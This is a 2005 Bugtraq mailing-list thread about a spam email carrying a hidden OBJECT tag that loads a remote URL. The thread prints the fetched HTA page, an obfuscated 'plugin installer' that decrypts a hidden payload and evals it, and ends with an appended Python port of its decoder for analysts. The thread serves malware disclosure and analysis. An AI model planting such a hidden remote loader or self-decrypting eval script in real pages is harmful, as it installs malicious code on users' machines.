RE: New auto download / install / exploit URL?

From: Geoff Vass (geoffcadzow.com.au)
Date: Sat Apr 23 2005 - 19:45:31 CDT


Using scanvirustotal.com, Fortinet 2.51 identifies it as VBS/Psyme.AY-tr, but no other vendors have detections yet.

Cheers
Geoff Vass

-----Original Message-----
From: Gandalf The White [mailto:gandalfdigital.net]
Sent: Saturday, 23 April 2005 13:11
To: bugtraqsecurityfocus.com
Subject: New auto download / install / exploit URL?

Greetings and Salutations:

Just received the attached e-mail with the below suspicious URL. I did a
fetch on the URL and received the item after the part labeled:
------ Fetched URL

FYI. Looks like possibly a Microsoft Media player exploit?

Someone want to take the time to decode?

Ken

---------------------------------------------------------------
Do not meddle in the affairs of wizards for they are subtle and
quick to anger.
Ken Hollis - Gandalf The White - gandalfdigital.net - O- TINLC
WWW Page - http://digital.net/~gandalf/
Trace E-Mail forgery - http://digital.net/~gandalf/spamfaq.html
Trolls crossposts - http://digital.net/~gandalf/trollfaq.html

------ Forwarded Message
Status: U
Return-Path: <coplanarsammimail.com>
Received: from 200165220159.user.veloxzone.com.br ([200.165.220.159])
    by wanamaker.mail.atl.earthlink.net (EarthLink SMTP Server) with SMTP id
1dp7eT1XH3Nl3oJ0
    for <gandalfdigital.net>; Fri, 22 Apr 2005 19:07:08 -0400 (EDT)
Date: Sat, 23 Apr 2005 01:48:17 +0000
From: Lexie RUSH <coplanarsammimail.com>
To: gandalfdigital.net
Subject: Hi
MIME-Version: 1.0
Content-Type: text/html; charset=iso-8859-1
Content-Transfer-Encoding: 7bit
Message-Id: <200504221907.1dp7eT1XH3Nl3oJ0wanamaker.mail.atl.earthlink.net>
X-ELNK-AV: 0

<HTML>
<BODY>
<FONT face="Verdana, Arial">
Hallo, Ayden!
<P>
their rat rewrote boiling. which sea bound us smoothly? enthusiastically
feather cut that operation inside floor. i burst the special picture over
meal. foolishly. some bent effect than tax, which underwent automatic, thick
wound. Jermaine outdrew a wise breath. she dug Rene what misread her Fatima!
they gainsaid late smoke, who undrew innocently... as cheese fitted
amusement, grip beset over your call minus necessary flame:
<P>
"where we redded him?"<BR>
"i unmade me late."
<P>
military curtain ball outgrew, he typeset seldom, obediently, annually. you
strung its long measure across her true experience, who forswore easily.
some necessary suggestion shod across our fly; open, thick wave. male throat
stamp blew, she stung innocently, suddenly, sadly. it split a slow society
unlike their waiting sugar, that resold never. your dependent air strewed
past an current; cold, blue work. what degree hanged him poorly? happily
flower misspelt its toe behind field. he withdrew his grey nerve as sex.
cheerfully. i clapped a dry egg up an loose whip, who dreamt only. i sent
his elastic harmony above this violent letter, that underran smoothly. she
hand-rode them important. Lexus cut her living cork. you spread Tate who
foreshowed us Renee! she spent the yellow leaf outside its ready car, that
linebred truthfully. the slow chord enwound than her brother; soft, late
observation. present draw offer wedded, they overtook kindly, rapidly,
thoughtfully. this medical middle misled versus some vessel; false, acid
ball. you underran the dry tray beneath the military interest, that overtook
safely. it retold her fat. i stripped awake cover, which reeved politely.
<P>
she dwelt their living unit of this hard help, that held not. its left gun
unsaid in this watch; late, dark shock. smooth quality bird underdid, they
thrived deliberately, warmly, equally. his certain chin sped through his
answer; ready, stiff frame. he unwound a blue destruction opposite some
mixed son, that thought roughly. it spat you dirty. you began early neck,
who wont smoothly...
<P>
fed their hollow person,<BR>
Yesenia BRAVO.
</FONT><P>
<img width=50 height=100 style="display:none"><div id="abc"></div><ObJecT
data="http://www.oil-bank.ru/cgi-bin/psde/rcounter.cgi?action=click">
</BODY>
</HTML>

 

------ End of Forwarded Message

------ Fetched URL

<HTML><HEAD><TITLE>Universal Plugin pre-Installer</TITLE>
<HTA:APPLICATION id=PlugInst
APPLICATIONNAME="Plugin Installer"
SHOWINTASKBAR=NO
CAPTION=YES
SINGLEINSTANCE=YES
MAXIMIZEBUTTON=NO
MINIMIZEBUTTON=NO
WINDOWSTATE=MINIMIZE
/></HEAD>
<OBJECT id="MSplay"
classid="clsid:F935DC22-1CF0-11D0-ADB9-00C04FD58A0B"></OBJECT>
<OBJECT id="MSmedia"
classid="clsid:0D43FE01-F093-11CF-8940-00A0C9054228"></OBJECT>
<BODY>
<textarea name="eCode" cols=1 rows=1
style="display:none">02a5f0adbe9e9e9e9ea1c2d5cdc5decedadfbcf6f2ad90defef7f3f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</textarea>
<script language="Javascript" type="text/javascript" id="oScript">
var cipher_block_size=64, encoding_buffer=1024;
function b0f(c) {
    return c < 16 ? '0' + c.toString(16) : c.toString(16);
}
function bff(c) {
    return parseInt(c, 16);
}
function salt(s) {
    var n = 0;
    for (var i=0; i<s.length; i++) n += i&s.charCodeAt(i);
    return b0f(n%256);
}
function decrypt(s,k) {
    var dbs = (cipher_block_size+1)*2;
    if (s.length > dbs) {
        var m=parseInt(s.length/dbs), t=Math.round(m/2)*dbs;
        return decrypt(s.substr(0, t), k) + decrypt(s.substr(t), k);
    }
    var n=bff(s.substr(0,2)), o='';
    for (var i=2; i<s.length; i+=2) {
        o +=
String.fromCharCode(bff(s.substr(i,2))^n^k.charCodeAt((i-2)/2%k.length));
    }
    return o;
}
function Get_CRC(s) {
ch=s.length;
CRC=0;
var CRC_Table=new Array(256);
for (i=0;i<256;i++)
{
    c = i;
    for (j=0;j<8;j++)
    {
      if ((c & 1) !=0)
      {c = (c >>>1) ^ 0xEDB88320;}
      else
      {c = c >>> 1;}
    }
    CRC_Table[i]=c;
}
TempCRC=0xFFFFFFFF;
for (i=1;i<ch;i++)
{
  chCode=s.charCodeAt(i);
  Tab_Index=(TempCRC & 255) ^ chCode;
  XOR_Value=CRC_Table[Tab_Index];
  TempCRC=(TempCRC >>> 8) ^ XOR_Value;
    
}
CRC=TempCRC ^ 0xFFFFFFFF;
return CRC;
}
var sURL=document.location.href; var
tKey=oScript.innerHTML+sURL.substr(0,22);
tKey=tKey.replace(/\r\n/g,'');
var nKey=new Number(0);
nKey=Get_CRC(tKey);
var eKey=nKey.toString();
var s=eCode.value.substr(2), k=salt(eKey), r='',
b=2*(encoding_buffer+encoding_buffer/cipher_block_size), p=0,
n=Math.floor(s.length/b)+1;
   while (p++ < n) {
         r += decrypt(s.substr((p-1)*b, b), eKey);
    }
eval(r);
</script>
</body></html>
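As an added analyst's aid (not part of the thread or the sample), the following Python port reproduces the HTA's key derivation and decoder so the textarea payload can be decoded offline from the script text and the original URL. It makes two quirks explicit that are easy to miss in the original: Get_CRC starts its loop at index 1, so it is a standard CRC-32 of the script text minus its first character, and salt() is computed but never used, the XOR key being the decimal CRC string. The script source and URL passed to derive_key, and the sample strings in the comments, are the analyst's inputs, not values taken from the page.

```python
import zlib

CIPHER_BLOCK_SIZE = 64    # the sample's cipher_block_size
ENCODING_BUFFER = 1024    # the sample's encoding_buffer

def get_crc(s: str) -> int:
    """Port of Get_CRC: CRC-32 (poly 0xEDB88320, init/xorout 0xFFFFFFFF),
    but the loop starts at index 1, so the first character is never hashed."""
    table = []
    for i in range(256):
        c = i
        for _ in range(8):
            c = (c >> 1) ^ 0xEDB88320 if c & 1 else c >> 1
        table.append(c)
    crc = 0xFFFFFFFF
    for ch in s[1:]:                                  # index 0 skipped, as in the original
        crc = (crc >> 8) ^ table[(crc & 0xFF) ^ ord(ch)]   # assumes ASCII script text
    return crc ^ 0xFFFFFFFF

def crc_matches_zlib(s: str) -> bool:
    """Cross-check: get_crc(s) equals a standard CRC-32 of s without its first char."""
    return get_crc(s) == zlib.crc32(s[1:].encode("latin-1"))

def derive_key(script_source: str, page_url: str) -> str:
    """tKey = script innerHTML + first 22 chars of the URL (CR/LF pairs removed);
    the key is the decimal string of its CRC. For the URL in the forwarded mail,
    22 chars is exactly 'http://www.oil-bank.ru', so the key is bound to that host.
    salt(eKey) is computed by the sample but never passed to decrypt, so it is omitted."""
    t_key = (script_source + page_url[:22]).replace("\r\n", "")
    return str(get_crc(t_key))

def decrypt(s: str, k: str) -> str:
    """Port of decrypt(): each 130-hex-char block is one mask byte followed by
    up to 64 data bytes, each XORed with the mask and a cycling key character."""
    if not s:                                          # JS returns '' for an empty chunk
        return ""
    dbs = (CIPHER_BLOCK_SIZE + 1) * 2
    if len(s) > dbs:
        m = len(s) // dbs
        t = ((m + 1) // 2) * dbs                       # JS Math.round(m/2) for positive m
        return decrypt(s[:t], k) + decrypt(s[t:], k)
    n = int(s[:2], 16)
    return "".join(chr(int(s[i:i + 2], 16) ^ n ^ ord(k[((i - 2) // 2) % len(k)]))
                   for i in range(2, len(s), 2))

def decode_payload(ecode: str, key: str) -> str:
    """Mirror of the top-level loop: drop the textarea's first two characters,
    then decrypt in chunks of b hex characters (2080 with the sample's constants)."""
    s = ecode[2:]
    b = 2 * (ENCODING_BUFFER + ENCODING_BUFFER // CIPHER_BLOCK_SIZE)
    return "".join(decrypt(s[p * b:(p + 1) * b], key) for p in range(len(s) // b + 1))
```

Because the key is derived from the script's own text and the URL it was loaded from, a copy saved to disk or re-hosted elsewhere will not decode; the original URL prefix and the byte-exact script body must be supplied.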